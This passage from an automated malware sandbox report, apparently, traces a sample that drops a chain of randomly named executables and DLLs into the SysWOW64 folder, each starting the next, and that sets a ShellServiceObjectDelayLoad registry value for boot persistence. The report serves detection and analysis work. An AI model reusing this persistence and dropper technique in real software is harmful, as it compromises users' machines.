                      Source: Ojacofgb.exe.9.dr | Static PE information: section name: .text entropy: 7.131994312266599
                      Source: Ppllkpoo.exe.10.dr | Static PE information: section name: .text entropy: 7.197605282946569
                      Source: Plbmqa32.exe.11.dr | Static PE information: section name: .text entropy: 7.212747053446963
                      Source: Plgflqpn.exe.12.dr | Static PE information: section name: .text entropy: 7.1777361111263085
                      Source: Pqeoao32.exe.13.dr | Static PE information: section name: .text entropy: 7.177836248776215
                      Source: Qgcpihjl.exe.14.dr | Static PE information: section name: .text entropy: 7.134079001018797
                      Source: Ajkolbad.exe.15.dr | Static PE information: section name: .text entropy: 7.150402572619783
                      Source: Bmlhnnne.exe.16.dr | Static PE information: section name: .text entropy: 7.194431112405807
                      Source: Bgamkfnl.exe.17.dr | Static PE information: section name: .text entropy: 7.0988104927922295
                      Source: Bqjacldl.exe.18.dr | Static PE information: section name: .text entropy: 7.091013664503109
                      Source: Bnnampcf.exe.19.dr | Static PE information: section name: .text entropy: 7.20252439678255
                      Source: Bnpnbp32.exe.20.dr | Static PE information: section name: .text entropy: 7.1751185880285115
                      Source: Bgibkegc.exe.21.dr | Static PE information: section name: .text entropy: 7.158359166193943
                      Source: Baagdk32.exe.22.dr | Static PE information: section name: .text entropy: 7.113332370732262
                      Source: Cfnpmb32.exe.23.dr | Static PE information: section name: .text entropy: 7.113109514581295
                      Source: Ccapffke.exe.24.dr | Static PE information: section name: .text entropy: 7.164772969477855
                      Source: Ceampi32.exe.25.dr | Static PE information: section name: .text entropy: 7.179274547360003
                      Source: Cnjaioih.exe.26.dr | Static PE information: section name: .text entropy: 7.167456147293733
                      Source: Camgpi32.exe.27.dr | Static PE information: section name: .text entropy: 7.196413393675492
                      Source: Dmfdkj32.exe.28.dr | Static PE information: section name: .text entropy: 7.086782180666274
                      Source: Dnhmjm32.exe.29.dr | Static PE information: section name: .text entropy: 7.1935468123219515
                      Source: Dfcboo32.exe.30.dr | Static PE information: section name: .text entropy: 7.176616641968521
                      Source: Edgbhcim.exe.31.dr | Static PE information: section name: .text entropy: 7.1259826879390165
                      Source: Emogai32.exe.32.dr | Static PE information: section name: .text entropy: 7.151027716339847
                      Source: Efgkjnfn.exe.33.dr | Static PE information: section name: .text entropy: 7.165314105248902
                      Source: Eoappk32.exe.34.dr | Static PE information: section name: .text entropy: 7.116004280215482
                      Source: Fkogfkdj.exe.35.dr | Static PE information: section name: .text entropy: 7.127555706075136
                      Source: Fhedeo32.exe.36.dr | Static PE information: section name: .text entropy: 7.18609657669522
                      Source: Feidnc32.exe.37.dr | Static PE information: section name: .text entropy: 7.156173388913616
                      Source: Foaigifk.exe.38.dr | Static PE information: section name: .text entropy: 7.1848996080474326
                      Source: Ggmnlk32.exe.39.dr | Static PE information: section name: .text entropy: 7.179269799391079

                      Persistence and Installation Behavior

                      Source: C:\Windows\SysWOW64\Oeanchcn.exe | Executable created and started: C:\Windows\SysWOW64\Oceoll32.exe
                      Source: C:\Windows\SysWOW64\Nejhbi32.exe | Executable created and started: C:\Windows\SysWOW64\Ogjdllpi.exe
                      Source: C:\Windows\SysWOW64\Bqjacldl.exe | Executable created and started: C:\Windows\SysWOW64\Bnnampcf.exe
                      Source: C:\Windows\SysWOW64\Plbmqa32.exe | Executable created and started: C:\Windows\SysWOW64\Plgflqpn.exe
                      Source: C:\Windows\SysWOW64\Qgcpihjl.exe | Executable created and started: C:\Windows\SysWOW64\Ajkolbad.exe
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exe | Executable created and started: C:\Windows\SysWOW64\Plbmqa32.exe
                      Source: C:\Windows\SysWOW64\Bnpnbp32.exe | Executable created and started: C:\Windows\SysWOW64\Bgibkegc.exe
                      Source: C:\Windows\SysWOW64\Onkcje32.exe | Executable created and started: C:\Windows\SysWOW64\Odekfoij.exe
                      Source: C:\Windows\SysWOW64\Dmfdkj32.exe | Executable created and started: C:\Windows\SysWOW64\Dnhmjm32.exe
                      Source: C:\Windows\SysWOW64\Ajkolbad.exe | Executable created and started: C:\Windows\SysWOW64\Bmlhnnne.exe
                      Source: C:\Windows\SysWOW64\Oglabl32.exe | Executable created and started: C:\Windows\SysWOW64\Olijjb32.exe
                      Source: C:\Windows\SysWOW64\Bnnampcf.exe | Executable created and started: C:\Windows\SysWOW64\Bnpnbp32.exe
                      Source: C:\Windows\SysWOW64\Dfcboo32.exe | Executable created and started: C:\Windows\SysWOW64\Edgbhcim.exe
                      Source: C:\Windows\SysWOW64\Emogai32.exe | Executable created and started: C:\Windows\SysWOW64\Efgkjnfn.exe
                      Source: C:\Windows\SysWOW64\Cnjaioih.exe | Executable created and started: C:\Windows\SysWOW64\Camgpi32.exe
                      Source: C:\Windows\SysWOW64\Eoappk32.exe | Executable created and started: C:\Windows\SysWOW64\Fkogfkdj.exe
                      Source: C:\Windows\SysWOW64\Ojacofgb.exe | Executable created and started: C:\Windows\SysWOW64\Ppllkpoo.exe
                      Source: C:\Windows\SysWOW64\Opbieagi.exe | Executable created and started: C:\Windows\SysWOW64\Oglabl32.exe
                      Source: C:\Windows\SysWOW64\Camgpi32.exe | Executable created and started: C:\Windows\SysWOW64\Dmfdkj32.exe
                      Source: C:\Windows\SysWOW64\Dnhmjm32.exe | Executable created and started: C:\Windows\SysWOW64\Dfcboo32.exe
                      Source: C:\Windows\SysWOW64\Ceampi32.exe | Executable created and started: C:\Windows\SysWOW64\Cnjaioih.exe
                      Source: C:\Windows\SysWOW64\Bgamkfnl.exe | Executable created and started: C:\Windows\SysWOW64\Bqjacldl.exe
                      Source: C:\Windows\SysWOW64\Efgkjnfn.exe | Executable created and started: C:\Windows\SysWOW64\Eoappk32.exe
                      Source: C:\Windows\SysWOW64\Bmlhnnne.exe | Executable created and started: C:\Windows\SysWOW64\Bgamkfnl.exe
                      Source: C:\Windows\SysWOW64\Cfnpmb32.exe | Executable created and started: C:\Windows\SysWOW64\Ccapffke.exe
                      Source: C:\Windows\SysWOW64\Edgbhcim.exe | Executable created and started: C:\Windows\SysWOW64\Emogai32.exe
                      Source: C:\Windows\SysWOW64\Pqeoao32.exe | Executable created and started: C:\Windows\SysWOW64\Qgcpihjl.exe
                      Source: C:\Windows\SysWOW64\Feidnc32.exe | Executable created and started: C:\Windows\SysWOW64\Foaigifk.exe
                      Source: C:\Windows\SysWOW64\Oceoll32.exe | Executable created and started: C:\Windows\SysWOW64\Onkcje32.exe
                      Source: C:\Windows\SysWOW64\Fhedeo32.exe | Executable created and started: C:\Windows\SysWOW64\Feidnc32.exe
                      Source: C:\Windows\SysWOW64\Olijjb32.exe | Executable created and started: C:\Windows\SysWOW64\Oeanchcn.exe
                      Source: C:\Windows\SysWOW64\Plgflqpn.exe | Executable created and started: C:\Windows\SysWOW64\Pqeoao32.exe
                      Source: C:\Windows\SysWOW64\Baagdk32.exe | Executable created and started: C:\Windows\SysWOW64\Cfnpmb32.exe
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exe | Executable created and started: C:\Windows\SysWOW64\Opbieagi.exe
                      Source: C:\Windows\SysWOW64\Odekfoij.exe | Executable created and started: C:\Windows\SysWOW64\Ojacofgb.exe
                      Source: C:\Users\user\Desktop\h879iieoae.exe | Executable created and started: C:\Windows\SysWOW64\Nejhbi32.exe
                      Source: C:\Windows\SysWOW64\Bgibkegc.exe | Executable created and started: C:\Windows\SysWOW64\Baagdk32.exe
                      Source: C:\Windows\SysWOW64\Fkogfkdj.exe | Executable created and started: C:\Windows\SysWOW64\Fhedeo32.exe
                      Source: C:\Windows\SysWOW64\Ccapffke.exe | Executable created and started: C:\Windows\SysWOW64\Ceampi32.exe
                      Source: C:\Windows\SysWOW64\Bgibkegc.exe | File created: C:\Windows\SysWOW64\Foelkeee.dll
                      Source: C:\Windows\SysWOW64\Oeanchcn.exe | File created: C:\Windows\SysWOW64\Oceoll32.exe
                      Source: C:\Windows\SysWOW64\Nejhbi32.exe | File created: C:\Windows\SysWOW64\Ogjdllpi.exe
                      Source: C:\Windows\SysWOW64\Bqjacldl.exe | File created: C:\Windows\SysWOW64\Bnnampcf.exe
                      Source: C:\Windows\SysWOW64\Plbmqa32.exe | File created: C:\Windows\SysWOW64\Plgflqpn.exe
                      Source: C:\Windows\SysWOW64\Qgcpihjl.exe | File created: C:\Windows\SysWOW64\Ajkolbad.exe
                      Source: C:\Windows\SysWOW64\Opbieagi.exe | File created: C:\Windows\SysWOW64\Hjanmb32.dll
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exe | File created: C:\Windows\SysWOW64\Plbmqa32.exe
                      Source: C:\Windows\SysWOW64\Bnpnbp32.exe | File created: C:\Windows\SysWOW64\Bgibkegc.exe
                      Source: C:\Windows\SysWOW64\Odekfoij.exe | File created: C:\Windows\SysWOW64\Bdlhdkdf.dll
                      Source: C:\Windows\SysWOW64\Onkcje32.exe | File created: C:\Windows\SysWOW64\Odekfoij.exe
                      Source: C:\Windows\SysWOW64\Ojacofgb.exe | File created: C:\Windows\SysWOW64\Accicdme.dll
                      Source: C:\Windows\SysWOW64\Ajkolbad.exe | File created: C:\Windows\SysWOW64\Iemjhp32.dll
                      Source: C:\Windows\SysWOW64\Dmfdkj32.exe | File created: C:\Windows\SysWOW64\Dnhmjm32.exe
                      Source: C:\Windows\SysWOW64\Bqjacldl.exe | File created: C:\Windows\SysWOW64\Lfjejf32.dll
                      Source: C:\Windows\SysWOW64\Ajkolbad.exe | File created: C:\Windows\SysWOW64\Bmlhnnne.exe
                      Source: C:\Windows\SysWOW64\Plgflqpn.exe | File created: C:\Windows\SysWOW64\Akghbg32.dll
                      Source: C:\Users\user\Desktop\h879iieoae.exe | File created: C:\Windows\SysWOW64\Jcofqqkm.dll
                      Source: C:\Windows\SysWOW64\Cfnpmb32.exe | File created: C:\Windows\SysWOW64\Ibigijoc.dll
                      Source: C:\Windows\SysWOW64\Oglabl32.exe | File created: C:\Windows\SysWOW64\Jdackq32.dll
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exe | File created: C:\Windows\SysWOW64\Chfnmf32.dll
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exe | File created: C:\Windows\SysWOW64\Fkdfmkhi.dll
                      Source: C:\Windows\SysWOW64\Fkogfkdj.exe | File created: C:\Windows\SysWOW64\Ajikgq32.dll
                      Source: C:\Windows\SysWOW64\Olijjb32.exe | File created: C:\Windows\SysWOW64\Ligdce32.dll
                      Source: C:\Windows\SysWOW64\Oglabl32.exe | File created: C:\Windows\SysWOW64\Olijjb32.exe
                      Source: C:\Windows\SysWOW64\Bnnampcf.exe | File created: C:\Windows\SysWOW64\Bnpnbp32.exe
                      Source: C:\Windows\SysWOW64\Dfcboo32.exe | File created: C:\Windows\SysWOW64\Edgbhcim.exe
                      Source: C:\Windows\SysWOW64\Emogai32.exe | File created: C:\Windows\SysWOW64\Efgkjnfn.exe
                      Source: C:\Windows\SysWOW64\Cnjaioih.exe | File created: C:\Windows\SysWOW64\Camgpi32.exe
                      Source: C:\Windows\SysWOW64\Feidnc32.exe | File created: C:\Windows\SysWOW64\Hdgplo32.dll
                      Source: C:\Windows\SysWOW64\Camgpi32.exe | File created: C:\Windows\SysWOW64\Ibbpip32.dll
                      Source: C:\Windows\SysWOW64\Eoappk32.exe | File created: C:\Windows\SysWOW64\Fkogfkdj.exe
                      Source: C:\Windows\SysWOW64\Ojacofgb.exe | File created: C:\Windows\SysWOW64\Ppllkpoo.exe
                      Source: C:\Windows\SysWOW64\Opbieagi.exe | File created: C:\Windows\SysWOW64\Oglabl32.exe
                      Source: C:\Windows\SysWOW64\Camgpi32.exe | File created: C:\Windows\SysWOW64\Dmfdkj32.exe
                      Source: C:\Windows\SysWOW64\Dnhmjm32.exe | File created: C:\Windows\SysWOW64\Dfcboo32.exe
                      Source: C:\Windows\SysWOW64\Efgkjnfn.exe | File created: C:\Windows\SysWOW64\Gfdcflnh.dll
                      Source: C:\Windows\SysWOW64\Ceampi32.exe | File created: C:\Windows\SysWOW64\Cnjaioih.exe
                      Source: C:\Windows\SysWOW64\Bnnampcf.exe | File created: C:\Windows\SysWOW64\Ekpjke32.dll
                      Source: C:\Windows\SysWOW64\Ceampi32.exe | File created: C:\Windows\SysWOW64\Hjjfnehb.dll
                      Source: C:\Windows\SysWOW64\Bgamkfnl.exe | File created: C:\Windows\SysWOW64\Bqjacldl.exe
                      Source: C:\Windows\SysWOW64\Efgkjnfn.exe | File created: C:\Windows\SysWOW64\Eoappk32.exe
                      Source: C:\Windows\SysWOW64\Bmlhnnne.exe | File created: C:\Windows\SysWOW64\Bgamkfnl.exe
                      Source: C:\Windows\SysWOW64\Dmfdkj32.exe | File created: C:\Windows\SysWOW64\Hjdhea32.dll
                      Source: C:\Windows\SysWOW64\Plbmqa32.exe | File created: C:\Windows\SysWOW64\Lfcadoap.dll
                      Source: C:\Windows\SysWOW64\Edgbhcim.exe | File created: C:\Windows\SysWOW64\Kfnpbj32.dll
                      Source: C:\Windows\SysWOW64\Baagdk32.exe | File created: C:\Windows\SysWOW64\Fcjdhk32.dll
                      Source: C:\Windows\SysWOW64\Dfcboo32.exe | File created: C:\Windows\SysWOW64\Pfgpqb32.dll
                      Source: C:\Windows\SysWOW64\Onkcje32.exe | File created: C:\Windows\SysWOW64\Jgemldcp.dll
                      Source: C:\Windows\SysWOW64\Cfnpmb32.exe | File created: C:\Windows\SysWOW64\Ccapffke.exe
                      Source: C:\Windows\SysWOW64\Edgbhcim.exe | File created: C:\Windows\SysWOW64\Emogai32.exe
                      Source: C:\Windows\SysWOW64\Pqeoao32.exe | File created: C:\Windows\SysWOW64\Qgcpihjl.exe
                      Source: C:\Windows\SysWOW64\Feidnc32.exe | File created: C:\Windows\SysWOW64\Foaigifk.exe
                      Source: C:\Windows\SysWOW64\Oceoll32.exe | File created: C:\Windows\SysWOW64\Onkcje32.exe
                      Source: C:\Windows\SysWOW64\Eoappk32.exe | File created: C:\Windows\SysWOW64\Lbfpda32.dll
                      Source: C:\Windows\SysWOW64\Fhedeo32.exe | File created: C:\Windows\SysWOW64\Njaakj32.dll
                      Source: C:\Windows\SysWOW64\Bnpnbp32.exe | File created: C:\Windows\SysWOW64\Pkjmee32.dll
                      Source: C:\Windows\SysWOW64\Bmlhnnne.exe | File created: C:\Windows\SysWOW64\Mfdadc32.dll
                      Source: C:\Windows\SysWOW64\Fhedeo32.exe | File created: C:\Windows\SysWOW64\Feidnc32.exe
                      Source: C:\Windows\SysWOW64\Pqeoao32.exe | File created: C:\Windows\SysWOW64\Clqdacnn.dll
                      Source: C:\Windows\SysWOW64\Foaigifk.exe | File created: C:\Windows\SysWOW64\Ckaenpam.dll
                      Source: C:\Windows\SysWOW64\Olijjb32.exe | File created: C:\Windows\SysWOW64\Oeanchcn.exe
                      Source: C:\Windows\SysWOW64\Cnjaioih.exe | File created: C:\Windows\SysWOW64\Ahhhnd32.dll
                      Source: C:\Windows\SysWOW64\Ccapffke.exeFile created: C:\Windows\SysWOW64\Ipqipqal.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Foaigifk.exeFile created: C:\Windows\SysWOW64\Ggmnlk32.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Emogai32.exeFile created: C:\Windows\SysWOW64\Flhljo32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Plgflqpn.exeFile created: C:\Windows\SysWOW64\Pqeoao32.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Oceoll32.exeFile created: C:\Windows\SysWOW64\Fehgpcld.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Baagdk32.exeFile created: C:\Windows\SysWOW64\Cfnpmb32.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeFile created: C:\Windows\SysWOW64\Bpghkh32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exeFile created: C:\Windows\SysWOW64\Opbieagi.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Bgamkfnl.exeFile created: C:\Windows\SysWOW64\Pdmohf32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Odekfoij.exeFile created: C:\Windows\SysWOW64\Ojacofgb.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Dnhmjm32.exeFile created: C:\Windows\SysWOW64\Ekpkmk32.dllJump to dropped file
                      Source: C:\Users\user\Desktop\h879iieoae.exeFile created: C:\Windows\SysWOW64\Nejhbi32.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeFile created: C:\Windows\SysWOW64\Pdkggn32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Bgibkegc.exeFile created: C:\Windows\SysWOW64\Baagdk32.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Fkogfkdj.exeFile created: C:\Windows\SysWOW64\Fhedeo32.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Qgcpihjl.exeFile created: C:\Windows\SysWOW64\Khlnhl32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Ccapffke.exeFile created: C:\Windows\SysWOW64\Ceampi32.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Bgibkegc.exeFile created: C:\Windows\SysWOW64\Foelkeee.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeFile created: C:\Windows\SysWOW64\Oceoll32.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeFile created: C:\Windows\SysWOW64\Ogjdllpi.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Bqjacldl.exeFile created: C:\Windows\SysWOW64\Bnnampcf.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Plbmqa32.exeFile created: C:\Windows\SysWOW64\Plgflqpn.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Qgcpihjl.exeFile created: C:\Windows\SysWOW64\Ajkolbad.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Opbieagi.exeFile created: C:\Windows\SysWOW64\Hjanmb32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exeFile created: C:\Windows\SysWOW64\Plbmqa32.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Bnpnbp32.exeFile created: C:\Windows\SysWOW64\Bgibkegc.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Odekfoij.exeFile created: C:\Windows\SysWOW64\Bdlhdkdf.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Onkcje32.exeFile created: C:\Windows\SysWOW64\Odekfoij.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Ojacofgb.exeFile created: C:\Windows\SysWOW64\Accicdme.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Ajkolbad.exeFile created: C:\Windows\SysWOW64\Iemjhp32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Dmfdkj32.exeFile created: C:\Windows\SysWOW64\Dnhmjm32.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Bqjacldl.exeFile created: C:\Windows\SysWOW64\Lfjejf32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Ajkolbad.exeFile created: C:\Windows\SysWOW64\Bmlhnnne.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Plgflqpn.exeFile created: C:\Windows\SysWOW64\Akghbg32.dllJump to dropped file
                      Source: C:\Users\user\Desktop\h879iieoae.exeFile created: C:\Windows\SysWOW64\Jcofqqkm.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Cfnpmb32.exeFile created: C:\Windows\SysWOW64\Ibigijoc.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Oglabl32.exeFile created: C:\Windows\SysWOW64\Jdackq32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exeFile created: C:\Windows\SysWOW64\Chfnmf32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exeFile created: C:\Windows\SysWOW64\Fkdfmkhi.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Fkogfkdj.exeFile created: C:\Windows\SysWOW64\Ajikgq32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Olijjb32.exeFile created: C:\Windows\SysWOW64\Ligdce32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Oglabl32.exeFile created: C:\Windows\SysWOW64\Olijjb32.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Bnnampcf.exeFile created: C:\Windows\SysWOW64\Bnpnbp32.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Dfcboo32.exeFile created: C:\Windows\SysWOW64\Edgbhcim.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Emogai32.exeFile created: C:\Windows\SysWOW64\Efgkjnfn.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Cnjaioih.exeFile created: C:\Windows\SysWOW64\Camgpi32.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\Feidnc32.exeFile created: C:\Windows\SysWOW64\Hdgplo32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\Camgpi32.exeFile created: C:\Windows\SysWOW64\Ibbpip32.dllJump to dropped file

                      Boot Survival

                      Source: C:\Users\user\Desktop\h879iieoae.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad Web Event Logger
                      Source: C:\Windows\SysWOW64\Bgibkegc.exe | Dropped PE file which has not been started: C:\Windows\SysWOW64\Foelkeee.dll
                      Source: C:\Windows\SysWOW64\Opbieagi.exe | Dropped PE file which has not been started: C:\Windows\SysWOW64\Hjanmb32.dll
                      Source: C:\Windows\SysWOW64\Onkcje32.exe | Dropped PE file which has not been started: C:\Windows\SysWOW64\Jgemldcp.dll
                      Source: C:\Windows\SysWOW64\Odekfoij.exe | Dropped PE file which has not been started: C:\Windows\SysWOW64\Bdlhdkdf.dll
                      Source: C:\Windows\SysWOW64\Ojacofgb.exe | Dropped PE file which has not been started: C:\Windows\SysWOW64\Accicdme.dll
                      Source: C:\Windows\SysWOW64\Ajkolbad.exe | Dropped PE file which has not been started: C:\Windows\SysWOW64\Iemjhp32.dll
                      Source: C:\Windows\SysWOW64\Eoappk32.exe | Dropped PE file which has not been started: C:\Windows\SysWOW64\Lbfpda32.dll
                      Source: C:\Windows\SysWOW64\Fhedeo32.exe | Dropped PE file which has not been started: C:\Windows\SysWOW64\Njaakj32.dll
                      Source: C:\Windows\SysWOW64\Bnpnbp32.exe | Dropped PE file which has not been started: C:\Windows\SysWOW64\Pkjmee32.dll
                      Source: C:\Windows\SysWOW64\Plgflqpn.exe | Dropped PE file which has not been started: C:\Windows\SysWOW64\Akghbg32.dll
                      Source: C:\Windows\SysWOW64\Bqjacldl.exe | Dropped PE file which has not been started: C:\Windows\SysWOW64\Lfjejf32.dll
                      Source: C:\Users\user\Desktop\h879iieoae.exe | Dropped PE file which has not been started: C:\Windows\SysWOW64\Jcofqqkm.dll
                      Source: C:\Windows\SysWOW64\Cfnpmb32.exe | Dropped PE file which has not been started: C:\Windows\SysWOW64\Ibigijoc.dll
                      Source: C:\Windows\SysWOW64\Bmlhnnne.exe | Dropped PE file which has not been started: C:\Windows\SysWOW64\Mfdadc32.dll
                      Source: C:\Windows\SysWOW64\Oglabl32.exe | Dropped PE file which has not been started: C:\Windows\SysWOW64\Jdackq32.dll
                      Source: C:\Windows\SysWOW64\Pqeoao32.exe | Dropped PE file which has not been started: C:\Windows\SysWOW64\Clqdacnn.dll
                      Source: C:\Windows\SysWOW64\Foaigifk.exe | Dropped PE file which has not been started: C:\Windows\SysWOW64\Ckaenpam.dll
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exe | Dropped PE file which has not been started: C:\Windows\SysWOW64\Chfnmf32.dll
                      Source: C:\Windows\SysWOW64\Cnjaioih.exe | Dropped PE file which has not been started: C:\Windows\SysWOW64\Ahhhnd32.dll
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exe | Dropped PE file which has not been started: C:\Windows\SysWOW64\Fkdfmkhi.dll
                      Source: C:\Windows\SysWOW64\Fkogfkdj.exe | Dropped PE file which has not been started: C:\Windows\SysWOW64\Ajikgq32.dll
                      Source: C:\Windows\SysWOW64\Olijjb32.exe | Dropped PE file which has not been started: C:\Windows\SysWOW64\Ligdce32.dll
                      Source: C:\Windows\SysWOW64\Ccapffke.exe | Dropped PE file which has not been started: C:\Windows\SysWOW64\Ipqipqal.dll
                      Source: C:\Windows\SysWOW64\Foaigifk.exe | Dropped PE file which has not been started: C:\Windows\SysWOW64\Ggmnlk32.exe
                      Source: C:\Windows\SysWOW64\Feidnc32.exe | Dropped PE file which has not been started: C:\Windows\SysWOW64\Hdgplo32.dll
                      Source: C:\Windows\SysWOW64\Emogai32.exe | Dropped PE file which has not been started: C:\Windows\SysWOW64\Flhljo32.dll
                      Source: C:\Windows\SysWOW64\Camgpi32.exe | Dropped PE file which has not been started: C:\Windows\SysWOW64\Ibbpip32.dll
                      Source: C:\Windows\SysWOW64\Oceoll32.exe | Dropped PE file which has not been started: C:\Windows\SysWOW64\Fehgpcld.dll
                      Source: C:\Windows\SysWOW64\Nejhbi32.exe | Dropped PE file which has not been started: C:\Windows\SysWOW64\Bpghkh32.dll
                      Source: C:\Windows\SysWOW64\Efgkjnfn.exe | Dropped PE file which has not been started: C:\Windows\SysWOW64\Gfdcflnh.dll
                      Source: C:\Windows\SysWOW64\Bgamkfnl.exe | Dropped PE file which has not been started: C:\Windows\SysWOW64\Pdmohf32.dll
                      Source: C:\Windows\SysWOW64\Ceampi32.exe | Dropped PE file which has not been started: C:\Windows\SysWOW64\Hjjfnehb.dll
                      Source: C:\Windows\SysWOW64\Bnnampcf.exe | Dropped PE file which has not been started: C:\Windows\SysWOW64\Ekpjke32.dll
                      Source: C:\Windows\SysWOW64\Dnhmjm32.exe | Dropped PE file which has not been started: C:\Windows\SysWOW64\Ekpkmk32.dll
                      Source: C:\Windows\SysWOW64\Oeanchcn.exe | Dropped PE file which has not been started: C:\Windows\SysWOW64\Pdkggn32.dll
                      Source: C:\Windows\SysWOW64\Dmfdkj32.exe | Dropped PE file which has not been started: C:\Windows\SysWOW64\Hjdhea32.dll
                      Source: C:\Windows\SysWOW64\Edgbhcim.exe | Dropped PE file which has not been started: C:\Windows\SysWOW64\Kfnpbj32.dll
                      Source: C:\Windows\SysWOW64\Plbmqa32.exe | Dropped PE file which has not been started: C:\Windows\SysWOW64\Lfcadoap.dll
                      Source: C:\Windows\SysWOW64\Qgcpihjl.exe | Dropped PE file which has not been started: C:\Windows\SysWOW64\Khlnhl32.dll
                      Source: C:\Windows\SysWOW64\Dfcboo32.exe | Dropped PE file which has not been started: C:\Windows\SysWOW64\Pfgpqb32.dll
                      Source: C:\Windows\SysWOW64\Baagdk32.exe | Dropped PE file which has not been started: C:\Windows\SysWOW64\Fcjdhk32.dll
                      Source: C:\Users\user\Desktop\h879iieoae.exe | API coverage: 8.3 %
                      Source: C:\Windows\SysWOW64\Nejhbi32.exe | API coverage: 8.3 %
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exe | API coverage: 8.3 %
                      Source: C:\Windows\SysWOW64\Opbieagi.exe | API coverage: 8.3 %
                      Source: C:\Windows\SysWOW64\Oglabl32.exe | API coverage: 8.3 %
                      Source: C:\Windows\SysWOW64\Olijjb32.exe | API coverage: 8.3 %
                      Source: C:\Windows\SysWOW64\Oeanchcn.exe | API coverage: 8.3 %
                      Source: C:\Windows\SysWOW64\Oceoll32.exe | API coverage: 8.3 %
                      Source: C:\Windows\SysWOW64\Onkcje32.exe | API coverage: 8.3 %
                      Source: C:\Windows\SysWOW64\Odekfoij.exe | API coverage: 8.3 %
                      Source: C:\Windows\SysWOW64\Ojacofgb.exe | API coverage: 8.3 %
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exe | API coverage: 8.3 %
                      Source: C:\Windows\SysWOW64\Plbmqa32.exe | API coverage: 8.3 %
                      Source: C:\Windows\SysWOW64\Plgflqpn.exe | API coverage: 8.3 %
                      Source: C:\Windows\SysWOW64\Pqeoao32.exe | API coverage: 8.3 %
                      Source: C:\Windows\SysWOW64\Qgcpihjl.exe | API coverage: 8.3 %
                      Source: C:\Windows\SysWOW64\Ajkolbad.exe | API coverage: 8.3 %
                      Source: C:\Windows\SysWOW64\Bmlhnnne.exe | API coverage: 8.3 %
                      Source: C:\Windows\SysWOW64\Bgamkfnl.exe | API coverage: 8.3 %
                      Source: C:\Windows\SysWOW64\Bqjacldl.exe | API coverage: 8.3 %
                      Source: C:\Windows\SysWOW64\Bnnampcf.exe | API coverage: 8.3 %
                      Source: C:\Windows\SysWOW64\Bnpnbp32.exe | API coverage: 8.3 %
                      Source: C:\Windows\SysWOW64\Bgibkegc.exe | API coverage: 8.3 %
                      Source: C:\Windows\SysWOW64\Baagdk32.exe | API coverage: 8.3 %
                      Source: C:\Windows\SysWOW64\Cfnpmb32.exe | API coverage: 8.3 %
                      Source: C:\Windows\SysWOW64\Ccapffke.exe | API coverage: 8.3 %
                      Source: C:\Windows\SysWOW64\Ceampi32.exe | API coverage: 8.3 %
                      Source: C:\Windows\SysWOW64\Cnjaioih.exe | API coverage: 8.3 %
                      Source: C:\Users\user\Desktop\h879iieoae.exe | Code function: 0_2_00402E06 GetVersion,LoadLibraryA,GetProcAddress,IsBadReadPtr,GlobalMemoryStatus,GetEnvironmentStringsW,CloseHandle,GetModuleHandleA,VirtualQuery,IsBadWritePtr | 0_2_00402E06
